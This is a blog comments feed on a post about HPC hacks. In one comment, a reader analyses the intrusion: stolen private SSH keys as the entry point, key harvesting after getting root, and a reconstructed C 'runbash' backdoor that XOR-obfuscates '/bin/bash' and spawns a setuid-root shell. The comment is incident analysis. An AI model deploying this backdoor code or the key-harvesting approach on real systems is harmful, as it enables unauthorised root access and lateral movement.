tag:blogger.com,1999:blog-8883034.post8583103985111654027..comments2024-03-23T23:26:40.813+01:00Comments on atdotde: High Performance HackersRoberthttp://www.blogger.com/profile/06634377111195468947noreply@blogger.comBlogger4125tag:blogger.com,1999:blog-8883034.post-19770067696590496422022-02-01T09:38:37.110+01:002022-02-01T09:38:37.110+01:00This comment has been removed by a blog administrator.ramhttps://www.blogger.com/profile/07417077063772786067noreply@blogger.comtag:blogger.com,1999:blog-8883034.post-1113122547680583982022-01-21T15:55:19.981+01:002022-01-21T15:55:19.981+01:00This comment has been removed by a blog administrator.Anonymoushttps://www.blogger.com/profile/16284209308127429627noreply@blogger.comtag:blogger.com,1999:blog-8883034.post-81936445171880427292020-07-29T18:48:02.958+02:002020-07-29T18:48:02.958+02:00This comment has been removed by the author.Alexahttps://www.blogger.com/profile/16749282870761102708noreply@blogger.comtag:blogger.com,1999:blog-8883034.post-4752097005207268152020-05-19T12:10:07.733+02:002020-05-19T12:10:07.733+02:00Your tarball has a dangling symlink and it would h...Your tarball has a dangling symlink and it would have been nice to have the original .font and .low files. There is also no source code for your myfont. Despite running a HPC system in the UK with users with accounts on LRZ, TU-Dresden and ARCHER (all of which have been hacked) we have escaped...<br /><br />The initial entry point is unsecured private SSH keys. Once you are in and if you make a successful privilege escalation to root then it is trivial to scan the system for more unsecured private SSH keys. The mechanism for the privilege escalation is unclear at this point.<br /><br />The original source for the runbash function probably looked something more like this<br /><br />void runbash(void)<br />{<br /> char command[] = "N\0\n\nJ\x04\x06\x1b\x01";<br /> char arguments[] = "\x03\x03\x10\f";<br /> char i;<br /> <br /> for (i=0;i<9;i++) {<br /> command[i] ^= i + 0x61U;<br /> }<br /><br /> for (i=0;i<4;i++) {<br /> arguments[i] ^= i + 0x61U;<br /> }<br /><br /> setgid(0);<br /> setuid(0);<br /> execl(command, arguments, 0);<br /><br /> return;<br />}<br /><br />As it stands it should not work as execl requires null terminated strings...Jonathanhttps://www.blogger.com/profile/17705593479061175044noreply@blogger.com